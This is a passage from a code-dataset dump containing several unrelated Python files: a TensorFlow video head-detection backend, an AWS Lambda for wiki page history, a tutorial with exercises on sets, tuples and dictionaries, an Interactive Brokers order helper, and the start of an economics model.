'Pullover', 'Dress', 'Coat', 'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot')\nplt.figure(figsize=(10, 10))\nplot_confusion_matrix(cm, names)\n","repo_name":"derekhanbaliq/DeepLizard-PyTorch-Tutorial","sub_path":"L28_confusion_matrix.py","file_name":"L28_confusion_matrix.py","file_ext":"py","file_size_in_byte":4469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"20494962607","text":"# -*- coding: utf-8 -*-\r\n# @Time : 2019-05-07 16:32\r\n# @Author : Tom Chen\r\n# @Email : chenbaocun@emails.bjut.edu.cn\r\n# @File : video_detect.py\r\n# @Software: PyCharm\r\nimport signal\r\nimport threading\r\nimport time\r\nimport numpy as np\r\nimport os\r\nimport sys\r\nimport tensorflow as tf\r\nimport cv2\r\nfrom matplotlib import pyplot as plt\r\nfrom .image_detect import image_detect\r\nfrom .models import Uploadvideos\r\nfrom .models import NumThreshold\r\nfrom .models import AbnormalImage\r\nfrom ffmpy import FFmpeg\r\nstart = time.time()\r\n\r\n# This is needed since the notebook is stored in the object_detection folder.\r\nsys.path.append(\"..\")\r\n\r\n# Object detection imports\r\nfrom object_detection.utils import label_map_util\r\nfrom object_detection.utils import visualization_utils as vis_util\r\n\r\n# Model preparation\r\n# What model to download.\r\nMODEL_NAME = 'ssd_mobilenet_v1_coco_2017_11_17' # [30,21] best\r\n\r\ndef video_detect(input_video,output_video,filename,username,):\r\n # Path to frozen detection graph. This is the actual model that is used for the object detection.\r\n # PATH_TO_CKPT = os.path.join('frozen_inference_graph.pb')\r\n PATH_TO_CKPT = '/root/detect_models/frozen_inference_graph.pb'\r\n # List of the strings that is used to add correct label for each box.\r\n # PATH_TO_LABELS = os.path.join('head_label_map.pbtxt')\r\n PATH_TO_LABELS = '/root/detect_models/head_label_map.pbtxt'\r\n NUM_CLASSES = 1\r\n\r\n # Load a (frozen) Tensorflow model into memory.\r\n detection_graph = tf.Graph()\r\n with detection_graph.as_default():\r\n od_graph_def = tf.GraphDef()\r\n with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:\r\n serialized_graph = fid.read()\r\n od_graph_def.ParseFromString(serialized_graph)\r\n tf.import_graph_def(od_graph_def, name='')\r\n\r\n # Loading label map\r\n label_map = label_map_util.load_labelmap(PATH_TO_LABELS)\r\n categories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES,\r\n use_display_name=True)\r\n category_index = label_map_util.create_category_index(categories)\r\n\r\n # Helper code\r\n def load_image_into_numpy_array(image):\r\n (im_width, im_height) = image.size\r\n return np.array(image.getdata()).reshape(\r\n (im_height, im_width, 3)).astype(np.uint8)\r\n\r\n # Size, in inches, of the output images.\r\n IMAGE_SIZE = (12, 8)\r\n a=NumThreshold.objects.filter(username=username)\r\n threshold = int(a[0].threshold)\r\n with detection_graph.as_default():\r\n with tf.Session(graph=detection_graph) as sess:\r\n # print(\"当前线程个数\" + str(len(threading.enumerate())))\r\n # print(\"进入了新线程\")\r\n # Definite input and output Tensors for detection_graph\r\n image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')\r\n # Each box represents a part of the image where a particular object was detected.\r\n detection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')\r\n # Each score represent how level of confidence for each of the objects.\r\n # Score is shown on the result image, together with the class label.\r\n detection_scores = detection_graph.get_tensor_by_name('detection_scores:0')\r\n detection_classes = detection_graph.get_tensor_by_name('detection_classes:0')\r\n num_detections = detection_graph.get_tensor_by_name('num_detections:0')\r\n\r\n # the video to be detected, eg, \"test.mp4\" here\r\n vidcap = cv2.VideoCapture(input_video)\r\n # Default resolutions of the frame are obtained.The default resolutions are system dependent.\r\n # We convert the resolutions from float to integer.\r\n frame_width = int(vidcap.get(3))\r\n frame_height = int(vidcap.get(4)) # 1920*1080\r\n # Define the codec and create VideoWriter object.The output is stored in 'outpy.avi' file. 'M', 'J', 'P', 'G'\r\n # 流媒体常用h264/avc编码,但是服务器上没有这种编码器,还是先输出成这种再进行转换。\r\n out_video = cv2.VideoWriter(output_video, cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'), 29,\r\n (frame_width, frame_height))\r\n\r\n while (True):\r\n ret, image = vidcap.read()\r\n if ret == True:\r\n\r\n # image_np = load_image_into_numpy_array(image)\r\n image_np = image\r\n\r\n # Expand dimensions since the model expects images to have shape: [1, None, None, 3]\r\n image_np_expanded = np.expand_dims(image_np, axis=0)\r\n # Actual detection.\r\n (boxes, scores, classes, num) = sess.run(\r\n [detection_boxes, detection_scores, detection_classes, num_detections],\r\n feed_dict={image_tensor: image_np_expanded})\r\n count = 0\r\n for i in np.squeeze(scores):\r\n if i > 0.55:\r\n count += 1\r\n # Visualization of the results of a detection.\r\n vis_util.visualize_boxes_and_labels_on_image_array(\r\n image_np,\r\n np.squeeze(boxes),\r\n np.squeeze(classes).astype(np.int32),\r\n np.squeeze(scores),\r\n category_index,\r\n use_normalized_coordinates=True,\r\n line_thickness=8)\r\n # plt.figure(figsize=IMAGE_SIZE)\r\n # plt.imshow(image_np)\r\n # Write the frame into the file 'output.avi'\r\n if (count > threshold):\r\n image_np = cv2.putText(image_np, \"Total:\" + str(count), (frame_width - 250, 70),\r\n cv2.FONT_HERSHEY_SIMPLEX, 1.2, (0, 0, 255), 2)\r\n else:\r\n image_np = cv2.putText(image_np, \"Total:\" + str(count), (frame_width - 250, 70),\r\n cv2.FONT_HERSHEY_SIMPLEX, 1.2, (0, 255, 0), 2)\r\n out_video.write(image_np)\r\n #测试是否是这导致的内存泄漏\r\n # plt.close()\r\n\r\n # Break the loop\r\n else:\r\n break\r\n\r\n out_video.release()\r\n end = time.time()\r\n Uploadvideos.objects.filter(username=username,filename=filename).update(hascalculated=1)\r\n print(\"视频计算结束,时间为: \", end - start)\r\n input_path='/root/DetectedVideos/'+filename\r\n output_path='/root/DetectedVideos_AVC/'+filename\r\n ff = FFmpeg(inputs={input_path: None}, outputs={output_path: '-vcodec h264 -s 1280*720 -acodec copy -f mp4'})\r\n ff.run()\r\n print(\"格式转换成功\")\r\n undetected_videos=Uploadvideos.objects.filter(hascalculated=0)\r\n if undetected_videos:\r\n for video in undetected_videos:\r\n new_thread = threading.Thread(target=video_detect, args=(\r\n \"/root/UploadVideos/\" + video.filename, \"/root/DetectedVideos/\" + video.filename, video.filename,\r\n video.username,))\r\n new_thread.start()\r\n break\r\n else:\r\n undetected_image = AbnormalImage.objects.filter(hascalculated=0)\r\n for image in undetected_image:\r\n new_thread = threading.Thread(target=image_detect, args=(\r\n \"/root/AbnormalImage/\" + str(image.filename), \"/root/DetectedImage/\" + str(image.filename.split(\".\")[0]+\".jpg\"),\r\n image.filename,image.username,))\r\n new_thread.start()\r\n break\r\n return 1","repo_name":"Chenbaocun/HeadDetection_Backend","sub_path":"Home/video_detect.py","file_name":"video_detect.py","file_ext":"py","file_size_in_byte":7814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"18850000713","text":"import boto3\nimport json\nimport os\nimport requests\n\n_s3_client = boto3.client(\"s3\")\n\n_history_metadata_root_url = os.environ[\"HISTORY_METADATA_ROOT_URL\"]\n_latest_revision_root_url = os.environ[\"LATEST_REVISION_ROOT_URL\"]\n_pages_bucket_name = os.environ[\"PAGES_BUCKET_NAME\"]\n\nclass NoHistoryException(Exception):\n pass\n\nclass UnexpectedError(Exception):\n pass\n\ndef _latest_revision(page_name):\n response = requests.get(\n \"{}/{}\".format(\n _latest_revision_root_url,\n page_name))\n if response.status_code == 404:\n raise NoHistoryException()\n elif response.status_code != 200:\n raise UnexpectedError()\n return int(response.text)\n\ndef _revision_data(page_name, revision_number):\n revision_metadata = json.loads(\n _s3_client.get_object(\n Bucket = _pages_bucket_name,\n Key = \"{}/{}/{}\".format(\n _history_metadata_root_url,\n page_name,\n revision_number))[\"Body\"].read())\n return {\n \"author\": revision_metadata[\"author\"],\n \"edit_time\": revision_metadata[\"edit_time\"]\n }\n\ndef _revisions(page_name):\n latest_revision = _latest_revision(page_name)\n return {\n i: _revision_data(page_name, i) for i in range(1, latest_revision + 1)\n }\n\n\ndef _handle_cors(event):\n headers = dict()\n try:\n origin_header = event[\"headers\"][\"origin\"]\n if (\"nlab-pages.s3.us-east-2.amazonaws.com\" in origin_header) or \\\n (\"ncatlab.org\" in origin_header):\n headers[\"Access-Control-Allow-Origin\"] = origin_header\n headers[\"Access-Control-Allow-Headers\"] = \"Content-Type\"\n headers[\"Access-Control-Allow-Methods\"] = \"OPTIONS, GET\"\n except KeyError:\n pass\n if event[\"requestContext\"][\"http\"][\"method\"] == \"OPTIONS\":\n if not headers:\n return (\n {\n \"isBase64Encoded\": False,\n \"statusCode\": 200,\n },\n None)\n return (\n {\n \"isBase64Encoded\": False,\n \"statusCode\": 200,\n \"headers\": headers\n },\n None)\n return None, headers\n\ndef lambda_handler(event, context):\n response, headers = _handle_cors(event)\n if response is not None:\n return response\n page_name = event[\"pathParameters\"][\"page_name\"]\n try:\n revisions = _revisions(page_name)\n except NoHistoryException:\n if not headers:\n return {\n \"isBase64Encoded\": False,\n \"statusCode\": 404\n }\n else:\n return {\n \"isBase64Encoded\": False,\n \"statusCode\": 404,\n \"headers\": headers,\n }\n except Exception as exception:\n raise exception\n if not headers:\n return {\n \"isBase64Encoded\": False,\n \"statusCode\": 500,\n \"headers\": {\n \"Content-Type\": \"text/plain\"\n },\n \"body\": \"An unexpected error occurred\"\n }\n else:\n headers[\"Content-Type\"] = \"text/plain\"\n return {\n \"isBase64Encoded\": False,\n \"statusCode\": 500,\n \"headers\": headers,\n \"body\": \"An unexpected error occurred\"\n }\n if not headers:\n headers = {\n \"Content-Type\": \"application/json\"\n }\n else:\n headers[\"Content-Type\"] = \"application/json\"\n return {\n \"isBase64Encoded\": False,\n \"statusCode\": 200,\n \"headers\": headers,\n \"body\": json.dumps(revisions, indent=2)\n }\n","repo_name":"ncatlab/aws_migration","sub_path":"lambdas/page_history/page_history.py","file_name":"page_history.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"72010215119","text":"#!/usr/bin/env python3\n\n# Storing Data Using Other Collection Types\n\n# Python has a type called set that allows us to store mutable collections of unordered, distinct items. \n# (Remember that a mutable object is one that you can modify.) Here we create a set containing the vowels\nvowels = {'a', 'e', 'i', 'o', 'u'}\nprint (vowels)\n\nvowels = {'a', 'e', 'a', 'a', 'i', 'o', 'u', 'u'}\nprint (vowels)\n\n# they contain the same items output True\nprint ({'a', 'e', 'i', 'o', 'u'} == {'a', 'e', 'a', 'a', 'i', 'o', 'u', 'u'})\n\n# Variable vowels refers to an object of type set:\nprint (type(vowels))\nprint (type({1, 2, 3}))\nprint (set())\nprint (type(set()))\nprint (set([2, 3, 2, 5]))\n\n# In addition to lists, there are a couple of other types that can be used as arguments to function set. One is a set:\n\nvowels = {'a', 'e', 'a', 'a', 'i', 'o', 'u', 'u'}\nprint (vowels)\nprint (set(vowels))\nprint (set({5, 3, 1}))\nprint (set(range(5)))\n\n\nvowels = {'a', 'e', 'i', 'o', 'u'}\nprint (vowels)\n\nvowels.add('y')\nprint (vowels)\n########\n# In the following code, we show all of these methods in action:\n########\n\nten = set(range(10))\nlows = {0, 1, 2, 3, 4}\nodds = {1, 3, 5, 7, 9}\nlows.add(9)\nprint (lows)\nprint (lows.difference(odds))\nprint (lows.issubset(ten))\nprint (lows.issuperset(odds))\nlows.remove(0)\nprint (lows)\nprint (lows.symmetric_difference(odds))\nprint (lows.union(odds))\nlows.clear()\nprint (lows)\n\n\n###########\n# Set operations in action:\n###########\n\nlows = set([0, 1, 2, 3, 4])\nodds = set([1, 3, 5, 7, 9])\n\nprint (lows - odds) # Equivalent to lows.difference(odds)\nprint (lows & odds) # Equivalent to lows.intersection(odds)\nprint (lows <= odds) # Equivalent to lows.issubset(odds)\nprint (lows >= odds) # Equivalent to lows.issuperset(odds)\nprint (lows | odds) # Equivalent to lows.union(odds)\nprint (lows ^ odds) # Equivalent to lows.symmetric_difference(odds)\n\n# The following program reads each line of the file, strips off the leading and\n# trailing whitespace, and adds the species on that line to the set. Notice the \n# type annotation specifying that the function returns a set of strings:\n\nfrom typing import Set, TextIO\nfrom io import StringIO\ndef observe_birds(observations_file: TextIO) -> Set[str]:\n \"\"\"Return a set of the bird species listed in observations_file, which has one bird species per line.\n >>> infile = StringIO('bird 1\\\\nbird 2\\\\nbird 1\\\\n')\n >>> birds = observe_birds(infile)\n >>> 'bird 1' in birds\n True\n >>> 'bird 2' in birds\n True\n >>> len(birds) == 2\n True\n \"\"\"\n birds_observed = set()\n for line in observations_file:\n bird = line.strip()\n birds_observed.add(bird)\n return birds_observed\n\nif __name__ == '__main__': \n import doctest\n doctest.testmod()\n with open('file_examples/observations.txt') as observations_file:\n print(observe_birds(observations_file))\n \n# Set Contents Must Be Immutable\n\n# >>> S = set()\n# >>> L = [1, 2, 3]\n# >>> S.add(L)\n# Traceback (most recent call last):\n# File \"\", line 1, in \n# TypeError: unhashable type: 'set'\n\n# Storing Data Using Tuples //// A tuple is a collection which is ordered and unchangeable. \n# In Python tuples are written with round brackets.\nrock = 'anthracite'\nprint (rock[9])\nprint (rock[0:3])\nprint (rock[-5:])\nfor character in rock[:5]:\n print(character)\n\n\n # Tuples are written using parentheses instead of brackets; \n # like strings and lists, they can be subscript- ed, sliced, and looped over:\n\nbases = ('A', 'C', 'G', 'T')\nfor base in bases:\n print(base)\n\nprint ((8))\nprint (type((8)))\nprint ((8,))\nprint ((5 + 3))\nprint ((5 + 3,))\n\n# Unlike lists, once a tuple is created, it cannot be mutated:\n# However, the objects inside tuples can still be mutated:\n\nlife = (['Canada', 76.5], ['United States', 75.5], ['Mexico', 72.0])\nlife[0][1] = 80.0\nprint (life)\n\n# We’ll build the same tuple as in the previous example,\n# but we’ll do it in steps. First let’s create three lists:\n\ncanada = ['Canada', 76.5]\nusa = ['United States', 75.5]\nmexico = ['Mexico', 72.0]\nlife = (canada, usa, mexico)\nmexico = ['Mexico', 72.5]\nprint (life)\n\n# And because variable canada also refers to that list, it sees the mutation:\n\nlife[0][1] = 80.0\nprint (canada)\n\n# Assigning to Multiple Variables Using Tuples\n\n(x, y) = (10, 20)\nprint (x)\nprint (y)\n\n# Python uses the comma as a tuple constructor, so we can leave off the parentheses:\n\nprint (10, 20)\nx, y = 10, 20\nprint (x)\nprint (y)\n\n# In fact, multiple assignment will work with lists and sets as well. \n# Python will happily pull apart information out of any collection:\n\n[[w, x], [[y], z]] = [{10, 20}, [(30,), 40]]\nprint (w)\nprint (x)\nprint (y)\nprint (z)\n\n\n# One of the most common uses of multiple assignment is to swap the values of two variables:\n\ns1 = 'first'\ns2 = 'second'\ns1, s2 = s2, s1\nprint (s1)\nprint (s2)\n\n\n# The following code uses a Boolean variable, found. Once a species is read from the file, \n# found is assigned False. The program then iterates over the list, looking for that species \n# at index 0 of one of the inner lists. If the species occurs in an inner list, found is assigned True.\n\nfrom typing import TextIO, List, Any\nfrom io import StringIO\n\ndef count_birds(observations_file: TextIO) -> List[List[Any]]:\n \"\"\"Return a set of the bird species listed in observations_file, which has one bird species per line.\n >>> infile = StringIO('bird 1\\\\nbird 2\\\\nbird 1\\\\n')\n >>> count_birds(infile)\n [['bird 1', 2], ['bird 2', 1]]\n \"\"\"\n bird_counts = []\n for line in observations_file:\n bird = line.strip()\n found = False\n # Find bird in the list of bird counts.\n for entry in bird_counts:\n if entry[0] == bird:\n entry[1] = entry[1] + 1\n found = True\n if not found: bird_counts.append([bird, 1])\n return bird_counts\n\nif __name__ == '__main__':\n with open('file_examples/observations.txt') as observations_file:\n bird_counts = count_birds(observations_file)\n # Print each bird and the number of times it was seen\n for entry in bird_counts:\n print(entry[0], entry[1])\n\n# Like the elements in sets, keys must be immutable (though the values associated with them don’t have to be). \n# putting key/value pairs inside braces (each key is followed by a colon and then by its value):\n\nbird_to_observations = {'canada goose': 3, 'northern fulmar': 1}\nprint (bird_to_observations)\n\n# To get the value associated with a key, we put the key in square brackets, much like indexing into a list:\n\nprint (bird_to_observations['northern fulmar'])\nprint (bird_to_observations['canada goose'])\n \n# As with sets, dictionaries are unordered:\n\ndict1 = {'canada goose': 3, 'northern fulmar': 1}\ndict2 = {'northern fulmar': 1, 'canada goose': 3}\nprint (dict1 == dict2)\n\n\n# Updating and Checking Membership\n\nbird_to_observations = {}\n\n# Add a new key/value pair, 'snow goose': 33\nbird_to_observations['snow goose'] = 33\n\n# Add a new key/value pair, 'eagle': 999.\nbird_to_observations['eagle'] = 999\n\nprint (bird_to_observations)\n\n# Change the value associated with key 'eagle' to 9.\nbird_to_observations['eagle'] = 9\nprint (bird_to_observations)\n\n\n# To remove an entry from a dictionary, use del d[k], where d is the dictionary \n# and k is the key being removed. Only entries that are present can be removed; \n# trying to remove one that isn’t there results in an error:\n\nbird_to_observations = {'snow goose': 33, 'eagle': 9}\ndel bird_to_observations['snow goose']\n\nprint (bird_to_observations)\n\n# To test whether a key is in a dictionary, we can use the in operator:\n\nbird_to_observations = {'eagle': 999, 'snow goose': 33}\nprint ('eagle' in bird_to_observations)\n\nif 'eagle' in bird_to_observations:\n print('eagles have been seen')\n\ndel bird_to_observations['eagle']\nprint ('eagle' in bird_to_observations)\n\nif 'eagle' in bird_to_observations:\n print('eagles have been seen')\n\n#Looping Over Dictionaries\n\nbird_to_observations = {'canada goose': 183, 'long-tailed jaeger': 71,\n 'snow goose': 63, 'northern fulmar': 1}\n\nfor bird in bird_to_observations:\n print(bird, bird_to_observations[bird])\n\n# Dictionary Operations\n\nscientist_to_birthdate = {'Newton' : 1642, 'Darwin' : 1809,\n 'Turing' : 1912}\nprint (scientist_to_birthdate.keys())\nprint (scientist_to_birthdate.values())\nprint (scientist_to_birthdate.items())\nprint (scientist_to_birthdate.get('Newton'))\nprint (scientist_to_birthdate.get('Curie', 1867))\nprint (scientist_to_birthdate)\n\nresearcher_to_birthdate = {'Curie' : 1867, 'Hopper' : 1906, \n'Franklin' : 1920}\nscientist_to_birthdate.update(researcher_to_birthdate)\nprint (scientist_to_birthdate)\nprint (researcher_to_birthdate)\nprint (researcher_to_birthdate.clear())\nprint (researcher_to_birthdate)\n###############\n# loop over the scientists and their birth years:\n###############\nscientist_to_birthdate = {'Newton' : 1642, 'Darwin' : 1809, 'Turing' : 1912}\nfor scientist, birthdate in scientist_to_birthdate.items(): \n print(scientist, 'was born in', birthdate)\n\n# Each time we read an observation from a file, \n# we check to see whether we have encountered that bird before—that is,\n# whether the bird is already a key in our dictionary.\n\nfrom typing import TextIO, Dict\nfrom io import StringIO\ndef count_birds(observations_file: TextIO) -> Dict[str, int]:\n \"\"\"Return a set of the bird species listed in observations_file, which has\n one bird species per line.\n >>> infile = StringIO('bird 1\\\\nbird 2\\\\nbird 1\\\\n')\n >>> count_birds(infile)\n {'bird 1': 2, 'bird 2': 1}\n \"\"\"\n bird_to_observations = {}\n for line in observations_file:\n bird = line.strip()\n if bird in bird_to_observations:\n bird_to_observations[bird] = bird_to_observations[bird] + 1\n else:\n bird_to_observations[bird] = 1\n\n return bird_to_observations\n \nif __name__ == '__main__':\n with open('file_examples/observations.txt') as observations_file:\n bird_to_observations = count_birds(observations_file)\n for bird, observations in bird_to_observations.items():\n print(bird, observations)\n\n# The function body can be shortened by using the method dict.get, which saves three lines.\n\ndef count_birds(observations_file: TextIO) -> Dict[str, int]:\n \"\"\"Return a set of the bird species listed in observations_file, which has one bird species per line.\n >>> infile = StringIO('bird 1\\\\nbird 2\\\\nbird 1\\\\n')\n >>> count_birds(infile)\n {'bird 1': 2, 'bird 2': 1}\n \"\"\"\n bird_to_observations = {}\n for line in observations_file:\n bird = line.strip()\n bird_to_observations[bird] = bird_to_observations.get(bird, 0) + 1\n\n return bird_to_observations\n\nif __name__ == '__main__':\n with open('file_examples/observations.txt') as observations_file:\n bird_to_observations = count_birds(observations_file)\n for bird, observations in bird_to_observations.items():\n print(bird, observations)\n\n# Inverting a Dictionary // You might want to print the birds in another order\n\nprint (bird_to_observations)\n\n# Invert the dictionary\nobservations_to_birds_list = {}\nfor bird, observations in bird_to_observations.items():\n if observations in observations_to_birds_list:\n observations_to_birds_list[observations].append(bird)\n else:\n observations_to_birds_list[observations] = [bird]\n\nprint (observations_to_birds_list)\n \n\n# Print the inverted dictionary\n\nobservations_sorted = sorted(observations_to_birds_list.keys())\n\nfor observations in observations_sorted:\n print(observations, ':', end=\" \")\n for bird in observations_to_birds_list[observations]:\n print(' ', bird, end=\" \")\n print()\n\n# Using the in Operator on Tuples, Sets, and Dictionaries\n\nodds = set([1, 3, 5, 7, 9])\nprint (9 in odds)\nprint (8 in odds)\nprint ('9' in odds)\nevens = (0, 2, 4, 6, 8)\nprint (4 in evens)\nprint (11 in evens)\n\n# When used on a dictionary, in checks whether a value is a key in the dictionary:\n\nbird_to_observations = {'canada goose': 183, 'long-tailed jaeger': 71, 'snow goose': 63, 'northern fulmar': 1}\n\nprint ('snow goose' in bird_to_observations)\nprint (183 in bird_to_observations)\n\n # Exercises Chapter 11\n\n# Task 1\n# Write a function called find_dups that takes a list of integers as its input argu-ment \n# and returns a set of those integers occurring two or more times in the list.\n\ndef find_dups(L):\n \"\"\" (list) -> set\n \n Return the number of duplicates numbers from L.\n >>> find_dups([1, 1, 2, 3, 4, 2]){1, 2}\n >>> find_dups([1, 2, 3, 4])\n set()\n \"\"\" \n \n elem_set = set()\n dups_set = set()\n \n for entry in L:\n len_initial = len(elem_set)\n elem_set.add(entry)\n len_after = len(elem_set)\n if len_initial == len_after:\n dups_set.add(entry)\n\n return(dups_set)\n\n\n# Task2\n# Write the bodies of the new versions of functions read_molecule and read_all_molecules from Creating New Type Annotations, on page 224.\n\ndef mating_pairs(males, females):\n \"\"\" (set, set) -> set of tupleReturn a set of tuples where each tuple contains a male from males and a \n female from females.\n \n >>> mating_pairs({'Anne', 'Beatrice', 'Cari'}, {'Ali', 'Bob', 'Chen'})\n {('Cari', 'Chen'), ('Beatrice', 'Bob'), ('Anne', 'Ali')}\n \"\"\" \n pairs = set()\n num_gerbils = len(males)\n \n for i in range(num_gerbils):\n \n male = males.pop()\n female = females.pop()\n pairs.add((male, female),)\n \n return pairs\n\nprint (mating_pairs)\n\n# Task3\n#Python’s set objects have a method called pop that removes and returns an arbitrary \n# element from the set. If the set gerbils contains five cuddly little ani- mals, for example, \n# calling gerbils.pop() five times will return those animals one by one, leaving the set empty at the end. \n# Use this to write a function called mating_pairs that takes two equal-sized sets called males and females as \n# input and returns a set of pairs; each pair must be a tuple containing one male and one female. \n# (The elements of males and females may be strings containing gerbil names or gerbil ID numbers—your function must work with both.)\n# \n\ndef get_authors(filenames):\n \"\"\" (list of str) -> set of str\n Return a list of the authors in PDB files names appear in filenames.\n \"\"\" \n authors = set()\n \n for filename in filenames:\n pdb_file = open(filename)\n \n for line in pdb_file:\n if line.lower().startswith('author'):\n author = line[6:].strip()\n authors.add(author)\n\n return authors\n\n# Task4\n# The PDB file format is often used to store information about molecules. \n# A PDB file may contain zero or more lines that begin with the word AUTHOR \n# (which may be in uppercase, lowercase, or mixed case), followed by spaces or tabs, \n# followed by the name of the person who created the file. Write a function that takes a \n# list of filenames as an input argument and returns the set of all author names found in those files.\n\ndef count_values(dictionary):\n \"\"\" (dict) -> intReturn the number of unique values in dictionary.\n >>> count_values({'red': 1, 'green': 2, 'blue': 2})2\n \"\"\" \n \n return len(set(dictionary.values()))\n\n# Task5\n# The keys in a dictionary are guaranteed to be unique, but the values are not. \n# Write a function called count_values that takes a single dictionary as an argument report erratum • \n# discuss and returns the number of distinct values it contains. Given the input {'red': 1, 'green': 1, 'blue': 2}, \n# for example, it should return 2.\n\ndef least_likely(particle_to_probability):\n \"\"\" (dict of {str: float}) -> str\n Return the particle from particle_to_probability with the lowest \n probablity.\n >>> least_likely({'neutron': 0.55, 'proton': 0.21, 'meson': 0.03, 'muon':\n 0.07})\n 'meson'\n \"\"\" \n smallest = 1\n name = ''\n \n for particle in particle_to_probability:\n probability = particle_to_probability[particle]\n if probability < smallest:\n smallest = probability\n name = particle\n\n return particle\n\n# Task 6\n\ndef count_duplicates(dictionary):\n \"\"\" (dic) -> intReturn the number of duplicate values in dictionary.\n >>> count_duplicates({'R': 1, 'G': 2, 'B': 2, 'Y': 1, 'P': 3})2\n \"\"\" \n duplicates = 0\n values = list(dictionary.values())\n for item in values:\n # if an item appears at least 2 times, it is a duplicate\n if values.count(item) >= 2:\n duplicates = duplicates + 1\n # remove that item from the list\n num_occurrences = values.count(item) \n for i in range(num_occurrences):\n values.remove(item)\n\n return duplicates\n\n# Task 7\n\ndef is_balanced(color_to_factor):\n \"\"\" (dict of {str: float}) -> boolReturn True if and only if color_to_factor represents a balanced color.\n >>> is_balanced({'R': 0.5, 'G': 0.4, 'B': 0.7})\n False\n >>> is_balanced({'R': 0.3, 'G': 0.5, 'B': 0.2})\n True\n \"\"\" \n values = list(color_to_factor.values())\n total = sum(values)\n return total == 1.0\n\n# Task 8\n\ndef dict_interest(dict1, dict2):\n \"\"\" (dict, dict) -> dictReturn a new dictionary that contains only the key/value pairs that occur\n in both dict1 and dict2.\n >>> dict_interest({'a': 1, 'b': 2, 'c': 3}, {'a': 1, 'd': 2, 'b': 2})\n {'a': 1, 'b': 2}\n \"\"\" \n intersection = {}\n for (key, value) in dict1.items():\n if key in dict2 and value == dict2[key]:\n intersection[key] = value\n\n return intersection\n\n# Task 9\n\ndef db_headings(dict_of_dict):\n \"\"\" (dict of dict) -> setReturn a set of the keys in the inner dictionaries in dict_of_dict.\n >>> db_headings({'A': {1: 'a', 2: 'b'}, 'B': {2: 'c', 3: 'd'}}){1, 2, 3}\n \"\"\" \n inner_keys = set()\n for key in dict_of_dict:\n for inner_key in dict_of_dict[key]:\n inner_keys.add(inner_key)\n\n return inner_keys\n\n# Task 11\n\ndef db_consistent(dict_of_dict):\n \"\"\" (dict of dict) -> set\n Return whether all inner dictionaries in dict_of_dict contain the same \n keys.\n >>> db_consistent({'A': {1: 'a', 2: 'b'}, 'B': {2: 'c', 3: 'd'}})\n False\n >>> db_consistent({'A': {1: 'a', 2: 'b'}, 'B': {2: 'c', 1: 'd'}})\n True\n \"\"\" \n inner_keys_list = []\n # Build a list of list of keys\n for key in dict_of_dict:\n inner_keys = list(dict_of_dict[key].keys())\n inner_keys.sort()\n inner_keys_list.append(inner_keys)\n for i in range(1, len(inner_keys_list)):\n # If the number of keys is different.\n if len(inner_keys_list[0]) != len(inner_keys_list[i]):\n return False\n # If the keys don't match.\n for j in range(len(inner_keys_list[0])):\n if inner_keys_list[0][j] != inner_keys_list[i][j]:\n return False\n\n return True\n\n\n# Task 12\n# a\ndef sparse_add(vector1, vector2):\n \"\"\" (dict of {int: int}, dict of {int: int} -> dict of {int: int})\n Return the sum of sparse vectors vector1 and vector2.\n >>> sparse_add({1: 3, 3: 4}, {2: 4, 3: 5, 5: 6})\n {1: 3, 2: 4, 3: 9, 5: 6}\n \"\"\" \n sum_vector = vector1.copy()\n for key in vector2:\n if key in sum_vector:\n sum_vector[key] = sum_vector[key] + vector2[key]\n else:sum_vector[key] = vector2[key]\n \n return sum_vector\n# b\n\ndef sparse_dot(vector1, vector2):\n \"\"\" (dict of {int: int}, dict of {int: int} -> dict of {int: int})\n Return the dot product of sparse vectors vector1 and vector2.\n >>> sparse_dot({1: 3, 3: 4}, {2: 4, 3: 5, 5: 6})20\n \"\"\" \n dot = 0\n for key1 in vector1:\n if key1 in vector2:\n dot = dot + vector1[key1] * vector2[key1]\n \n return dot\n","repo_name":"chavo1/python","sub_path":"ch11.py","file_name":"ch11.py","file_ext":"py","file_size_in_byte":19864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"6444670285","text":"from ibapi.contract import Contract\nfrom ibapi.order import Order\n\nfrom ..crud.users import update_balance\nfrom ..ib.client import ib\n\n\nasync def create_order(symbol, currency, action, user, db):\n contract = Contract()\n contract.symbol = symbol.upper()\n contract.secType = \"STK\"\n contract.currency = currency.upper()\n contract.exchange = \"SMART\"\n\n order = Order()\n order.action = \"SELL\" if action == 1 else \"BUY\"\n order.orderType = \"MKT\"\n order.transmit = True\n order.totalQuantity = await get_quantity(user.balance)\n action = \"+\" if action == 1 else 0\n await update_balance(db, user.username, order.totalQuantity, action)\n nextID = 101\n ib.placeOrder(nextID, contract, order)\n\n\nasync def get_quantity(balance: float):\n if balance <= 100:\n return balance * 0.03\n else:\n return balance * 0.05\n","repo_name":"TharakiKarunarathna/FX_International","sub_path":"forex-international-main/forex-international-main/app/services/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"29334937615","text":"import mlecon as mle\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport tensorflow as tf\n\n# Reset graph\nmle.clear()\n\n# Hyper-parameters\nhidden = [32, 16, 8]\ndt = mle.dt\nΔt = 0.5\nmle.delta_t = Δt\nbatch_size = 256\nmle.set_batch_size(batch_size)\n\n# State variables\nK = mle.state(.1, 10)\nz = mle.state(-0.5, .5)\nσ = mle.state(-6, -1)\n\n# Brownian Shocks\ndZ = mle.brownian_shocks(2)\n\n# Model parameters\nβ, ν, ζ, δ, λ, σ_, γ, η, ρ, ψ = 0.04, 0.36, .3, 0.0196, 0.95, -3, 4, .1, .9, .5\nθ = (1 - γ) / (1 - 1 / ψ)\n\n# Function approximators\nJ = mle.network([K, z, σ], hidden, name='Value_function')\nL = mle.network([K, z, σ], hidden, name='labor', 